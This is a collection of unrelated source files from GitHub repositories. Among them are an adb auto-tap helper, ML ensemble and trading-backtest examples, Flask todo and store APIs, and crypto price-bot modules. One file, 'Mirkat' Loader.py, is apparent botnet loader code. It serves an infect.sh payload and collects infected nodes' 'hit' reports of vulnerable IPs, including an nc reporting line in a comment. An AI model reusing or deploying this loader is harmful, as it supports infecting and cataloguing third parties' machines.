elif action[0] == 'click':
if action[1]:
self.sleep(action[1])
for i in range(action[2]):
os.system('{} -s {} shell input tap {} {}'.format(self.adb_path, self.id, position[0], position[1]))
# Completion in future.
else:
pass
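# A minimal end-to-end sketch (template names, paths and the adb location are
# hypothetical and must match your own setup):
#
#   pap = PyAutoPlay_adb(template_name=['start.png'], precondition=[],
#                        adb_path='adb.exe')
#   devices = pap.get_all_title_id()
#   pap.set_id(next(iter(devices.values())))
#   result = pap.recognize(pap.get_screenshot())
#   if result:
#       # positions are in resized coordinates; scale back up by ratio
#       pap.send_action(tuple(int(v * pap.ratio) for v in result['position']))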
``` |
{
"source": "0x11DFE/Mirkat",
"score": 2
} |
#### File: 0x11DFE/Mirkat/Loader.py
```python
import http.server, socketserver, threading, functools, socket
__FileServerPort__ = 1337
__ListennerPort__ = 6969
class MirkatConnection(threading.Thread):
def __init__(self, session: socket.socket, ip: str, port: int):
threading.Thread.__init__(self)
self.session = session
self.port = port
self.ip = ip
def run(self):
        print(f'[+] Connection established with {self.ip}:{self.port}')
while True:
try:
data = self.session.recv(1024).decode('utf-8').strip().split('\n')[0]
if '|' in data:
                    args = data.split('|')
if args[0] == 'hit':
print(f'[%] Hit from {self.ip} --> {args[1]}')
with open('./db/vuln.txt', 'a+') as vf:
vf.write(f'{args[1]}\n')
except:
pass
class Loader():
def __init__(self):
self.run()
def http_server(self):
with socketserver.TCPServer(('0.0.0.0', __FileServerPort__), functools.partial(http.server.SimpleHTTPRequestHandler, directory= './Bin/')) as httpd:
print(f'[*] File server open on port {__FileServerPort__}.')
httpd.serve_forever()
def run(self):
threading.Thread(target= self.http_server).start()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', __ListennerPort__))
        print(f'[*] Loader listening on port {__ListennerPort__}')
        sock.listen(1000)  # listen() only needs to be called once, before the accept loop
        while True:
            (socket_session, (ip, port)) = sock.accept()
MirkatConnection(socket_session, ip, port).start()
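# Protocol sketch: an infected node reports back over the raw TCP listener with
# a pipe-delimited message, e.g. (hypothetical host and IP):
#   printf 'hit|203.0.113.7\n' | nc loader-host 6969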
if __name__ == '__main__':
with open('./Bin/infect.sh', 'r+') as pf:
print(f'[*] Payload "{pf.read()}"')
Loader().run()
``` |
{
"source": "0x15F9/DeepStack",
"score": 3
} |
#### File: DeepStack/examples/Cifar10.py
```python
import UtilsCifar10
from deepstack.base import KerasMember
from deepstack.ensemble import DirichletEnsemble
from deepstack.ensemble import StackEnsemble
from sklearn.ensemble import RandomForestRegressor
def cifar10_example(nmembers=4):
"""
Runs 2 DeepStack Ensemble Models for the CIFAR-10 Dataset.
Args:
nmembers: amount of ensemble members to be generated
Returns: an instance of StackEnsemble and DirichletEnsemble for the
CIFAR-10 dataset
"""
stack = StackEnsemble() # Meta-Learner
stack.model = RandomForestRegressor(verbose=1, n_estimators=300 * nmembers,
max_depth=nmembers * 2, n_jobs=4)
dirichletEnsemble = DirichletEnsemble(N=2000 * nmembers)
for i in range(nmembers):
# Creates a Random CNN Keras Model for CIFAR-10 Dataset
model, training_batch, validation_batch = UtilsCifar10.get_random_cifar_model()
"""
Rationale: The Validation and Testing dataset of a base-learner
is the Training and Validation Dataset of a Meta-Learner.
Idea is to avoid validating the meta-learner
on data that the base-learner has already seen on training
"""
member = KerasMember(name="model" + str(i + 1), keras_model=model,
train_batches=training_batch,
val_batches=validation_batch) # Base-Learners
stack.add_member(member) # Adds base-learner to Stack Ensemble
dirichletEnsemble.add_member(member) # Adds base-learner
stack.fit()
dirichletEnsemble.fit()
return stack, dirichletEnsemble
if __name__ == "__main__":
# Run Examples
stack, dirichletEnsemble = cifar10_example()
stack.describe()
"""
Possible similar Output:
model1 - AUC: 0.8044
model2 - AUC: 0.8439
model3 - AUC: 0.8218
model4 - AUC: 0.8487
StackEnsemble AUC: 0.8727
"""
dirichletEnsemble.describe()
"""
Possible similar Output:
model1 - Weight: 0.1055 - AUC: 0.8044
model2 - Weight: 0.2882 - AUC: 0.8439
model3 - Weight: 0.2127 - AUC: 0.8218
model4 - Weight: 0.3936 - AUC: 0.8487
DirichletEnsemble AUC: 0.8821
"""
``` |
{
"source": "0x16c3/todoApp",
"score": 3
} |
#### File: todoApp/server/todoAppServer.py
```python
from flask import Flask, jsonify, request
import json
from flask_cors import CORS
from mongoengine import connect, StringField, Document, DateTimeField, BooleanField
from datetime import datetime
connect("todo")
app = Flask(__name__)
CORS(app, resources={r"/*": {"origins": "*"}})
class todoObject:
_id = ""
title = ""
description = ""
is_completed = None
created_at = ""
updated_at = ""
def __init__(self, **kwargs) -> "todoObject":
self._id = kwargs["_id"]
self.title = kwargs["title"]
self.description = kwargs["description"]
self.is_completed = kwargs["is_completed"]
self.updated_at = kwargs["updated_at"]
self.created_at = kwargs["created_at"]
class todoList(Document):
title = StringField()
description = StringField()
is_completed = BooleanField()
created_at = DateTimeField()
updated_at = DateTimeField()
    def create(
        self,
        title: str,
        description: str,
        is_completed: bool = False,
        created_at: datetime = None,
        updated_at: datetime = None,
    ) -> "todoList":
        self.title = title
        self.description = description
        self.is_completed = is_completed
        # default the timestamp per call; a `datetime.now()` default argument
        # would be frozen at import time
        self.updated_at = updated_at or datetime.now()
        if created_at:
            self.created_at = created_at
        return self
@app.route("/todoList", methods=["GET", "POST", "PUT"])
@app.route("/todoList/<string:oid>", methods=["DELETE"])
def index(oid=None):
    if oid is None:
if request.method == "GET":
todo_list = todoList.objects()
if len(todo_list) < 1:
return ""
all_objects = []
for object in todo_list.order_by("-id"):
todo = todoObject(
_id=str(object.id),
title=object.title,
description=object.description,
is_completed=object.is_completed,
created_at=object.created_at.strftime("%m/%d/%Y, %H:%M:%S"),
updated_at=object.updated_at.strftime("%m/%d/%Y, %H:%M:%S"),
)
all_objects.append(todo.__dict__)
return json.dumps(all_objects)
elif request.method == "POST":
data = request.get_json()
new_todo = todoList().create(
title=data["title"],
description=data["description"],
created_at=datetime.now(),
)
new_todo.save()
return jsonify(success="OK")
elif request.method == "PUT":
data = request.get_json()
oid = data["_id"]
object = todoList.objects(id=oid).first()
if not object:
return jsonify(success="FAIL")
object.is_completed = True
object.updated_at = datetime.now()
object.save()
return jsonify(success="OK")
else:
if request.method == "DELETE":
object = todoList.objects(id=oid).first()
if not object:
return jsonify(success="FAIL")
object.delete()
return jsonify(success="OK")
if __name__ == "__main__":
app.run(port=5005, debug=True)
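# Example client calls (a minimal sketch, assuming the server above is running
# on localhost:5005 and the third-party `requests` package is installed):
#
#   import requests
#   requests.post("http://localhost:5005/todoList",
#                 json={"title": "buy milk", "description": "2 liters"})
#   todos = requests.get("http://localhost:5005/todoList").json()
#   requests.put("http://localhost:5005/todoList",
#                json={"_id": todos[0]["_id"]})  # mark first item completed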
``` |
{
"source": "0x174/conflux",
"score": 3
} |
#### File: api/api_v1/action_graph.py
```python
from enum import Enum
from dataclasses import dataclass, field
from typing import List
# ---------------------- Capabilities Classes Start Here -----------------------
# We define things such as robotic control, or lab equipment as Resources. Each
# Resource has certain capabilities described here. For example, a Hamilton has
# the capability for Liquid Handling, Motion, and Thermal Control while an OT2
# does not have access to Motion.
#
# This obviously gets muddy as many of our targets have modular capabilities,
# such as the addition of extending subsytems. For the purposes of our initial
# pass we're going to ignore that capability.
class Capabilities(Enum):
LIQUID_HANDLING = "LiquidHandling"
THERMAL_CONTROL = "ThermalControl"
MOTION = "Motion"
@dataclass
class BaseCapabilities:
name: str = None
capabilities: Enum = None
@dataclass
class HamiltonCapabilities(BaseCapabilities):
name: str = "Hamilton"
capabilities: List = field(default_factory=list)
def __post_init__(self):
self.capabilities = [
Capabilities.LIQUID_HANDLING,
Capabilities.THERMAL_CONTROL,
Capabilities.MOTION,
]
@dataclass
class OT2Capabilities(BaseCapabilities):
pass
@dataclass
class BioautomationPrimitiveBase:
pass
class ActionGraph:
def __init__(self):
"""
"""
pass
if __name__ == '__main__':
thing = HamiltonCapabilities()
print(thing.capabilities)
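# A minimal sketch of how a scheduler might gate work on a Resource's
# capabilities (the `supports` helper is hypothetical, not part of this repo):
def supports(resource: BaseCapabilities, needed: Capabilities) -> bool:
    return resource.capabilities is not None and needed in resource.capabilities
# supports(HamiltonCapabilities(), Capabilities.MOTION)  -> True
# supports(OT2Capabilities(), Capabilities.MOTION)       -> False (no capability list)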
```
#### File: app/crud/crud_protocol.py
```python
from typing import List
from fastapi.encoders import jsonable_encoder
from sqlalchemy.orm import Session
from app.crud.base import CRUDBase
from app.models.protocols import Protocol
from app.schemas.protocols import ProtocolCreate, ProtocolUpdate
class CRUDProtocol(CRUDBase[Protocol, ProtocolCreate, ProtocolUpdate]):
def create_with_owner(
self,
db: Session,
*,
obj_in: ProtocolCreate,
creator_id: int
) -> Protocol:
'''
Args:
db: database session
obj_in: protocol creation schema
creator_id: id of the user who owns the new protocol
Returns:
the persisted Protocol instance
'''
obj_in_data = jsonable_encoder(obj_in)
db_obj = self.model(**obj_in_data, creator_id=creator_id)
db.add(db_obj)
db.commit()
db.refresh(db_obj)
return db_obj
def get_multi_by_owner(
self,
db: Session,
*,
creator_id: int,
skip: int = 0,
limit: int = 100,
) -> List[Protocol]:
'''
Args:
db: database session
creator_id: id of the owning user
skip: number of rows to skip
limit: maximum number of rows to return
Returns:
the matching Protocol rows
'''
return (
db.query(self.model)
.filter(Protocol.creator_id == creator_id)
.offset(skip)
.limit(limit)
.all()
)
protocol = CRUDProtocol(Protocol)
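# Example usage (a sketch, assuming a SQLAlchemy Session `db` and a
# ProtocolCreate instance `payload` supplied by the surrounding app):
#   created = protocol.create_with_owner(db=db, obj_in=payload, creator_id=1)
#   mine = protocol.get_multi_by_owner(db=db, creator_id=1, skip=0, limit=10)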
``` |
{
"source": "0x18katyan/datastructure-algorithms",
"score": 4
} |
#### File: datastructure-algorithms/Array/merge_sorted_arrays.py
```python
def merge_sort(list1, list2):
list3 = list1 + list2
list3 = sorted(list3)
return list3
# list1 = [0, 3, 4, 31]
list1 = []
list2 = [4, 6, 30]
print(merge_sort(list1, list2))
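# Note: sorted(list1 + list2) runs in O((n+m) log(n+m)). A minimal sketch of
# the classic O(n+m) two-pointer merge, assuming both inputs are already sorted:
def merge_two_pointer(a, b):
    out, i, j = [], 0, 0
    while i < len(a) and j < len(b):
        if a[i] <= b[j]:
            out.append(a[i])
            i += 1
        else:
            out.append(b[j])
            j += 1
    out.extend(a[i:])  # at most one of these tails is non-empty
    out.extend(b[j:])
    return out
# print(merge_two_pointer([0, 3, 4, 31], [4, 6, 30]))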
```
#### File: datastructure-algorithms/Array/merge_sort_new.py
```python
def merge_sort(arr):
if len(arr) > 1:
mid = len(arr) // 2
L = arr[:mid]
R = arr[mid:]
merge_sort(L)
merge_sort(R)
i = j = k = 0
while i < len(L) and j < len(R):
print("arr is", arr)
print("i is {}, j is {} , k is {}".format(i, j , k))
if L[i] < R[j]:
arr[k] = L[i]
i += 1
else:
arr[k] = R[j]
j += 1
k += 1
while i < len(L):
arr[k] = L[i]
k += 1
i += 1
while j < len(R):
arr[k] = R[j]
k += 1
j += 1
arr = [123, 45, 1, 2, 67, 8, 10, 1, 456, 234, 456, 9]
print("Length of original arr is", len(arr))
merge_sort(arr)
print("Length of sorted arr is", len(arr))
print("Sorted Array: ", arr)
``` |
{
"source": "0x1997/gll",
"score": 2
} |
#### File: gll/gll/runtime.py
```python
from collections import defaultdict
from gll.gss import GSSNode
from gll.sppf import DummyNode, TerminalNode
class Descriptor(object):
def __init__(self, rule_state, input_pos, gss_node, nonpacked_node):
self.state = rule_state
self.input_pos = input_pos
self.gss_node = gss_node
self.nonpacked_node = nonpacked_node
def resume(self, runtime):
self.state.resume(runtime, self)
class Runtime(object):
def __init__(self, grammar, input):
self.input = input
self.start = grammar.start
self.start_gss_node = GSSNode(grammar.start, 0)
# R: [Descriptor]
self.pending = [Descriptor(state, 0, self.start_gss_node, DummyNode())
for state in grammar.start.first_states()]
self.states = defaultdict(dict)
self.error = None
def has_next(self):
return len(self.pending) != 0
def dispatch(self):
while self.has_next():
descriptor = self.pending.pop()
descriptor.resume(self)
return self.start_gss_node.results.get(self.input.len - 1)
def record_error(self, *args):
self.error = args
def add(self, *args):
self.pending.append(Descriptor(*args))
def get_term_node(self, term_state, i, j):
term_nodes = self.states[term_state]
node = term_nodes.get(i)
if node is None:
node = term_nodes[i] = TerminalNode(term_state, i, j)
return node
def create_gss_edge(self, nonterm_state, input_pos, return_state,
target_gss_node, nonpacked_node):
gss_nodes = self.states[nonterm_state]
node = gss_nodes.get(input_pos)
if node is not None:
node.add_edge(input_pos, return_state, target_gss_node,
nonpacked_node)
return
node = gss_nodes[input_pos] = GSSNode(nonterm_state, input_pos)
node.add_edge(input_pos, return_state, target_gss_node, nonpacked_node)
for state in nonterm_state.nonterminal.look_ahead_test(input_pos):
self.pending.append(Descriptor(state, input_pos, node, DummyNode()))
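# Typical driver (a sketch, assuming `grammar` and `input` objects are built
# elsewhere in this package):
#   runtime = Runtime(grammar, input)
#   sppf_root = runtime.dispatch()  # drains all pending descriptors
#   if sppf_root is None:
#       print("parse failed:", runtime.error)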
``` |
{
"source": "0x1a8008/bitcoin-store",
"score": 2
} |
#### File: bitcoinstore/api/api.py
```python
from flask import Blueprint, request
from bitcoinstore.api.handlers.get_fungible \
import get_fungible as get_fungible_handler
from bitcoinstore.api.handlers.get_non_fungible \
import get_non_fungible as get_non_fungible_handler
from bitcoinstore.api.handlers.post_fungible \
import post_fungible as post_fungible_handler
from bitcoinstore.api.handlers.post_fungible_add_remove \
import post_fungible_add_remove as post_fungible_add_remove_handler
from bitcoinstore.api.handlers.put_fungible \
import put_fungible as put_fungible_handler
from bitcoinstore.api.handlers.post_fungible_reserve \
import post_fungible_reserve as post_fungible_reserve_handler
from bitcoinstore.api.handlers.put_non_fungible \
import put_non_fungible as put_non_fungible_handler
from bitcoinstore.api.handlers.put_non_fungible_reserve \
import put_non_fungible_reserve as put_non_fungible_reserve_handler
from bitcoinstore.api.handlers.delete_non_fungible_reserve \
import delete_non_fungible_reserve as delete_non_fungible_reserve_handler
api = Blueprint("api", __name__)
"""
get_fungible()
Used for retrieving fungible items by sku.
"""
@api.get("/api/fungible/<string:sku>")
def get_fungible(sku):
try:
return get_fungible_handler(sku)
except Exception as e:
print(e)
return "Internal server error", 500
"""
get_non_fungible()
Used for retrieving non-fungible items by sku and sn.
"""
@api.get("/api/non-fungible/<string:sku>/<string:sn>")
def get_non_fungible(sku, sn):
try:
return get_non_fungible_handler(sku, sn)
except Exception as e:
print(e)
return "Internal server error", 500
"""
post_fungible()
Used for adding fungible items without a sku.
This creates an item sku.
<body application/json> {
amount_in_stock: int | undefined
color: str | undefined
description: str | undefined
shipping_weight_grams: int | undefined
unit_price_cents: int | undefined
}
"""
@api.post("/api/fungible")
def post_fungible():
try:
properties = request.json
return post_fungible_handler(properties)
except Exception as e:
print(e)
return "Internal server error", 500
"""
post_fungible_add()
Used for adding quantity to an item by sku.
"""
@api.post("/api/fungible/<string:sku>/add/<int:quantity>")
def post_fungible_add(sku, quantity):
try:
return post_fungible_add_remove_handler(sku, quantity)
except Exception as e:
print(e)
return "Internal server error", 500
"""
post_fungible_remove()
Used for removing quantity from an item by sku.
"""
@api.post("/api/fungible/<string:sku>/remove/<int:quantity>")
def post_fungible_remove(sku, quantity):
try:
return post_fungible_add_remove_handler(sku, -quantity)
except Exception as e:
print(e)
return "Internal server error", 500
"""
post_fungible_reserve()
Used to reserve a quantity of fungible units.
"""
@api.post("/api/fungible/<string:sku>/reserve/<int:quantity>")
def post_fungible_reserve(sku, quantity) -> dict:
try:
return post_fungible_reserve_handler(sku, quantity)
except Exception as e:
print(e)
return "Internal server error", 500
"""
put_fungible()
Used for adding or updating fungible items by their sku.
If the sku exists, the item is updated; otherwise it is added.
<body application/json> {
amount_in_stock: int | undefined
color: str | undefined
description: str | undefined
shipping_weight_grams: int | undefined
unit_price_cents: int | undefined
}
"""
@api.put("/api/fungible/<string:sku>")
def put_fungible(sku) -> dict:
try:
properties = request.json
return put_fungible_handler(sku, properties)
except Exception as e:
print(e)
return "Internal server error", 500
"""
put_non_fungible()
Used for adding or updating non-fungible items by their serial number and sku.
If the serial number and sku exist, the item is updated; otherwise it is added.
<body application/json> {
color: str | undefined
description: str | undefined
notes: str | undefined
price_cents: int | undefined
shipping_weight_grams: int | undefined
sold: bool | undefined
}
"""
@api.put("/api/non-fungible/<string:sku>/<string:sn>")
def put_non_fungible(sku, sn):
try:
properties = request.json
return put_non_fungible_handler(sku, sn, properties)
except Exception as e:
print(e)
return "Internal server error", 500
"""
put_non_fungible_reserve()
Used to reserve the non-fungible item for sale.
This sets the reserved field to the current datetime so stale reservations can be expired later.
"""
@api.put("/api/non-fungible/<string:sku>/<string:sn>/reservation")
def put_non_fungible_reserve(sku, sn):
try:
return put_non_fungible_reserve_handler(sku, sn)
except Exception as e:
print(e)
return "Internal server error", 500
"""
delete_non_fungible_reserve()
Used to release the reservation on a non-fungible item.
This clears the reserved field set by put_non_fungible_reserve().
"""
@api.delete("/api/non-fungible/<string:sku>/<string:sn>/reservation")
def delete_non_fungible_reserve(sku, sn):
try:
return delete_non_fungible_reserve_handler(sku, sn)
except Exception as e:
print(e)
return "Internal server error", 500
```
#### File: api/handlers/put_fungible.py
```python
from bitcoinstore.extensions import db
from bitcoinstore.api.models.FungibleItem import FungibleItem
def put_fungible(sku, properties) -> dict:
try:
item = db.session.query(FungibleItem).get(sku)
if not item: # Insert new
item = FungibleItem(sku, properties)
else:
item.update(properties)
db.session.add(item)
db.session.commit()
return item.get_summary()
except Exception as e:
print(e)
return {}
```
#### File: api/handlers/put_non_fungible.py
```python
from bitcoinstore.extensions import db
from bitcoinstore.api.models.NonFungibleItem import NonFungibleItem
from bitcoinstore.api.models.NonFungibleType import NonFungibleType
def put_non_fungible(sku, sn, properties) -> dict:
try:
type = db.session.query(NonFungibleType).get(sku)
if not type: # SKU type does not exist, create one
type = NonFungibleType(sku, properties)
db.session.add(type)
else:
type.update(properties)
item = db.session.query(NonFungibleItem).get(sn)
if not item: # SN item does not exist, create one
item = NonFungibleItem(sn, properties)
item.sku = sku
else:
item.update(properties)
db.session.add(type)
db.session.add(item)
db.session.commit()
item_summary = item.get_summary()
type_summary = type.get_summary()
return {
"sn": item_summary['sn'],
"color": item_summary['color'],
"description": type_summary['description'],
"notes": item_summary['notes'],
"price_cents": item_summary['price_cents'],
"reserved": item_summary['reserved'],
"shipping_weight_grams": type_summary['shipping_weight_grams'],
"sku": item_summary['sku'],
"sold": item_summary['sold']
}
except Exception as e:
print(e)
return {}
``` |
{
"source": "0x1be20/vnpy",
"score": 2
} |
#### File: vnpy/vnpy/example.py
```python
import math
import numpy as np
import os
import sys
import csv
from datetime import datetime  # the datetime(...) constructor is used below
import pandas as pd
from vnpy.app.cta_strategy.backtesting import BacktestingEngine, OptimizationSetting
from vnpy.app.cta_strategy.base import BacktestingMode
from vnpy.app.cta_strategy import (
CtaTemplate,
TickData,
TradeData,
OrderData,
)
from vnpy.trader.constant import Exchange  # Exchange.BINANCE is referenced below
feature_cols = ['custom_feature']
"""
Build custom tick data so that features can be computed with vectorized pandas operations
"""
class MLTickData(TickData):
def __init__(self,**kargs):
for key in feature_cols:
setattr(self,key,kargs[key])
del(kargs[key])
TickData.__init__(self,**kargs)
class MLStrategy(CtaTemplate):
def __init__(self,cta_engine,strategy_name,vt_symbol,setting):
CtaTemplate.__init__(self,cta_engine,strategy_name,vt_symbol,setting)
self.model = setting['model']
self.features = feature_cols
def on_init(self):
print("ml strategy init")
self.load_tick(0)
def on_start(self):
print("ml strategy start")
def on_tick(self,tick:MLTickData):
feature_datas = []
for key in self.features:
feature_datas += [getattr(tick,key)]
predict = self.model.predict([feature_datas])[0]
ret = math.exp(predict)
print('predict',ret)
if self.pos>0:
if ret>1.0003:
return
elif ret>1 and ret<1.0002:
self.cancel_all()
self.sell(tick.ask_price_1,self.pos)
elif ret<0.9997:
self.cancel_all()
# cover
self.sell(tick.ask_price_1,self.pos)
# short
self.short(tick.ask_price_1,0.1)
elif self.pos<0:
if ret<0.9997:
return
elif ret>0.9997 and ret<0.9998:
self.cancel_all()
self.cover(tick.bid_price_1,abs(self.pos))
elif ret>1.0003:
self.cancel_all()
self.cover(tick.bid_price_1,abs(self.pos))
self.buy(tick.bid_price_1,0.1)
elif self.pos==0:
if ret<0.9997:
self.short(tick.ask_price_1,0.1)
elif ret>1.0003:
self.buy(tick.bid_price_1,0.1)
def on_trade(self,trade:TradeData):
self.put_event()
# tick conversion helpers
def mapCol(item) -> dict:
"""
Convert the dataframe's quote fields to vnpy tick field names
"""
colMap = {}
for i in range(1,6):
colMap['ask_price_{}'.format(i)] = float(item["ap{}".format(i)])
colMap['ask_volume_{}'.format(i)] = float(item["aq{}".format(i)])
colMap['bid_price_{}'.format(i)] = float(item["bp{}".format(i)])
colMap['bid_volume_{}'.format(i)] = float(item["bq{}".format(i)])
return colMap
# attach the computed features to the custom tick
def mapFeature(item) -> dict:
featureMap = {}
for key in feature_cols:
featureMap[key] = item[key]
return featureMap
data = testData.apply(lambda item:MLTickData(
symbol="BTC",
exchange=Exchange.BINANCE,
datetime=item.timestamp,
**mapFeature(item),
**mapCol(item),
),axis=1)
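# (`testData` is assumed to be a pandas DataFrame of level-2 quotes with the
# feature columns precomputed, and `model` a fitted regressor exposing
# .predict; neither is defined in this snippet.)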
engine = BacktestingEngine()
engine.set_parameters(
vt_symbol="BTC.BINANCE",
interval="1m",
start=datetime(2020,5,19),
end=datetime(2021,5,22),
rate=0,
slippage=0,
size=.1,
pricetick=5,
capital=100000,
mode=BacktestingMode.TICK,
inverse=True,
)
engine.add_strategy(MLStrategy,setting={"model":model})
# engine.load_data()
# set the historical data directly
engine.history_data = data
engine.run_backtesting()
# show per-trade statistics
engine.exhaust_trade_result(engine.trades)
``` |
{
"source": "0x1d00ffff/0xbtc-discord-price-bot",
"score": 2
} |
#### File: 0xbtc-discord-price-bot/exchanges/coinmarketcap.py
```python
from .base_exchange import BaseExchangeAPI
from secret_info import COINMARKETCAP_API_KEY
from async_url_helpers import get_json_from_url
class CoinMarketCapAPI(BaseExchangeAPI):
def __init__(self, currency_symbol):
super().__init__()
self._SERVER_URL = "https://pro-api.coinmarketcap.com/v1"
self.currency_symbol = currency_symbol
self.exchange_name = "Coin Market Cap"
self.command_names = ['cmc', 'coinmarketcap']
self.short_url = "https://bit.ly/1hJ8ztr"
self.last_updated_time = 0
self.update_failure_count = 0
self._skip_counter = 0
async def _update_cmc_data(self, timeout):
parameters = {
'symbol': self.currency_symbol
}
headers = {
'Accepts': 'application/json',
'X-CMC_PRO_API_KEY': COINMARKETCAP_API_KEY,
}
method = "/cryptocurrency/quotes/latest"
data = await get_json_from_url(
self._SERVER_URL + method,
parameters=parameters,
headers=headers)
# CMC-only attributes; TODO: use market_cap in !market or something
self.rank = int(data['data'][self.currency_symbol]['cmc_rank'])
self.market_cap = float(data['data'][self.currency_symbol]['quote']['USD']['market_cap'])
self.price_usd = float(data['data'][self.currency_symbol]['quote']['USD']['price'])
# hack: only pull volume data for ETH and BTC, since they are usually
# used as reference currencies only. The volume is ignored for other
# currencies, since volume in this bot is defined as a per-exchange
# volume, not an aggregate like CMC's api.
#
# this is done because otherwise, coinmarketcap would have its own volume
# for the 0xBTC pair, and the rest of this program would treat it as an
# exchange with N volume - but that volume is really just an aggregate
# of the volumes of our other tracked exchanges
if self.currency_symbol == "ETH" or self.currency_symbol == "BTC":
self.volume_usd = float(data['data'][self.currency_symbol]['quote']['USD']['volume_24h'])
self.change_24h = float(data['data'][self.currency_symbol]['quote']['USD']['percent_change_24h']) / 100.0
if self.currency_symbol == "ETH":
self.price_eth = 1
self.eth_price_usd = self.price_usd
if self.currency_symbol == "BTC":
self.price_btc = 1
self.btc_price_usd = self.price_usd
async def _update(self, timeout=10.0):
# HACK: since coinmarketcap has a much lower api limit than the other data
# sources, add a check here to only update every 10th time this function is
# called. combined with the 2m normal update rate, this should limit CMC to an
# update only every 20m.
if self._skip_counter <= 0:
await self._update_cmc_data(timeout)
self._skip_counter = 10
else:
self._skip_counter -= 1
return
if __name__ == "__main__":
eth_api = CoinMarketCapAPI('ETH')
eth_api.load_once_and_print_values()
eth_api = CoinMarketCapAPI('0xBTC')
eth_api.load_once_and_print_values()
```
#### File: 0xbtc-discord-price-bot/exchanges/forkdelta.py
```python
import logging
from web3 import Web3
import time
from .base_exchange import Daily24hChangeTrackedAPI
from .etherdelta_v2_abi import exchange_abi
from secret_info import ETHEREUM_NODE_URL
from constants import SECONDS_PER_ETH_BLOCK
from persistent_storage import Storage
ETHERDELTA_V2_ADDRESS = "0x8d12A197cB00D4747a1fe03395095ce2A5CC6819"
# etherdelta does a weird thing where it treats eth as a token at 0x0. this is a copy
ETH_AS_TOKEN_ADDRESS = "0x0000000000000000000000000000000000000000"
ETHEREUM_DECIMALS = 18
class ForkDeltaAPI(Daily24hChangeTrackedAPI):
def __init__(self, currency_symbol, persistent_storage):
super().__init__()
self.exchange_name = "ForkDelta"
self.command_names = ["fd", "fork delta"]
self.short_url = "https://bit.ly/2rqTGWB"
self.currency_symbol = currency_symbol
self._persistent_storage = persistent_storage
self._time_volume_last_updated = 0
# TODO: switch to using a global token address lookup module
if self.currency_symbol == "0xBTC":
self._token_address = "0xB6eD7644C69416d67B522e20bC294A9a9B405B31"
self._token_decimals = 8
else:
raise RuntimeError("Unknown currency_symbol {}, need to add address to forkdelta.py. Note that if you are running two forkdelta modules at once, you will need to upgrade ForkDeltaAPI to use different persistent_storage modules.".format(self.currency_symbol))
self.volume_tokens = 0
self.volume_eth = 0
self.price_eth = 0
self._w3 = Web3(Web3.HTTPProvider(ETHEREUM_NODE_URL))
self._exchange = self._w3.eth.contract(address=ETHERDELTA_V2_ADDRESS, abi=exchange_abi)
async def get_history_n_hours(self, num_hours=25, timeout=10.0):
volume_tokens = 0
volume_eth = 0
last_price = None
trade_topic = "0x6effdda786735d5033bfad5f53e5131abcced9e52be6c507b62d639685fbed6d"
withdraw_topic = "0xf341246adaac6f497bc2a656f546ab9e182111d630394f0c57c710a59a2cb567"
deposit_topic = "0xdcbc1c05240f31ff3ad067ef1ee35ce4997762752e3a095284754544f4c709d7"
cancel_topic = "0x1e0b760c386003e9cb9bcf4fcf3997886042859d9b6ed6320e804597fcdb28b0"
current_eth_block = self._w3.eth.blockNumber
for event in self._w3.eth.getLogs({
'fromBlock': current_eth_block - (int(60*60*num_hours / SECONDS_PER_ETH_BLOCK)),
'toBlock': current_eth_block - 1,
'address': self._exchange.address}):
topic0 = self._w3.toHex(event['topics'][0])
if topic0 == trade_topic:
#print('trade in tx', self._w3.toHex(event['transactionHash']))
receipt = self._w3.eth.getTransactionReceipt(event['transactionHash'])
parsed_logs = self._exchange.events.Trade().processReceipt(receipt)
correct_log = None
for log in parsed_logs:
if log.address.lower() == self._exchange.address.lower():
correct_log = log
if correct_log is None:
logging.warning('bad trade transaction {}'.format(self._w3.toHex(event['transactionHash'])))
continue
tokenGet = correct_log.args.tokenGet
amountGet = correct_log.args.amountGet
tokenGive = correct_log.args.tokenGive
amountGive = correct_log.args.amountGive
get = correct_log.args.get
give = correct_log.args.give # this is msg.sender from contract perspective
block_number = correct_log.blockNumber
if tokenGive.lower() == self._token_address.lower():
token_amount = amountGive / 10**self._token_decimals
eth_amount = amountGet / 10**ETHEREUM_DECIMALS
elif tokenGet.lower() == self._token_address.lower():
token_amount = amountGet / 10**self._token_decimals
eth_amount = amountGive / 10**ETHEREUM_DECIMALS
else:
# trade doesn't include token we are interested in, so skip
continue
volume_tokens += token_amount
volume_eth += eth_amount
last_price = eth_amount / token_amount
#print('{} tokens and {} eth - last_price {}'.format(token_amount, eth_amount, last_price))
elif topic0 == withdraw_topic:
#print('withdraw in tx', self._w3.toHex(event['transactionHash']))
continue
elif topic0 == deposit_topic:
#print('deposit in tx', self._w3.toHex(event['transactionHash']))
continue
elif topic0 == cancel_topic:
#print('cancel in tx', self._w3.toHex(event['transactionHash']))
continue
else:
logging.debug('unknown topic txhash {}'.format(self._w3.toHex(event['transactionHash'])))
logging.debug('unknown topic topic0 {}'.format(topic0))
return volume_tokens, volume_eth, last_price
async def _update(self, timeout=10.0):
# update day's volume only once every hour since it loads eth api
if time.time() - self._time_volume_last_updated > 60*60:
volume_tokens, volume_eth, last_price = await self.get_history_n_hours(num_hours=24, timeout=timeout)
self.volume_tokens = volume_tokens
self.volume_eth = volume_eth
self._time_volume_last_updated = time.time()
else:
# on other updates, simply check the last 10 mins for price changes
_, _, last_price = await self.get_history_n_hours(num_hours=10.0/60.0, timeout=timeout)
# Forkdelta is difficult to handle; there is no price available from the contract.
# Instead you must remember the price of the last trade. Of course there are
# better and more complicated ways to consider price (order book for example) but
# this tracker does not aim to be complicated.
if last_price is None:
last_price = self._persistent_storage.last_forkdelta_price.get()
else:
self._persistent_storage.last_forkdelta_price.set(last_price)
self.price_eth = last_price
if __name__ == "__main__":
storage = Storage('./test_data/databases/')
oxbtc_api = ForkDeltaAPI("0xBTC", storage)
oxbtc_api.load_once_and_print_values()
# dai_api = ForkDeltaAPI("OMG")
# dai_api.load_once_and_print_values()
```
#### File: 0xbtc-discord-price-bot/exchanges/quickswap.py
```python
import logging
from web3 import Web3
import time
import requests
from .base_exchange import Daily24hChangeTrackedAPI, NoLiquidityException
from .uniswap_v2_abi import exchange_abi
from .uniswap_v2_router_abi import router_abi
from secret_info import MATIC_NODE_URL
from constants import SECONDS_PER_MATIC_BLOCK
from token_class import MaticToken, NoTokenMatchError
from weighted_average import WeightedAverage
# list of exchange contract addresses. each pair has a unique address.
# token0 name, token1 name, uniswap exchange address
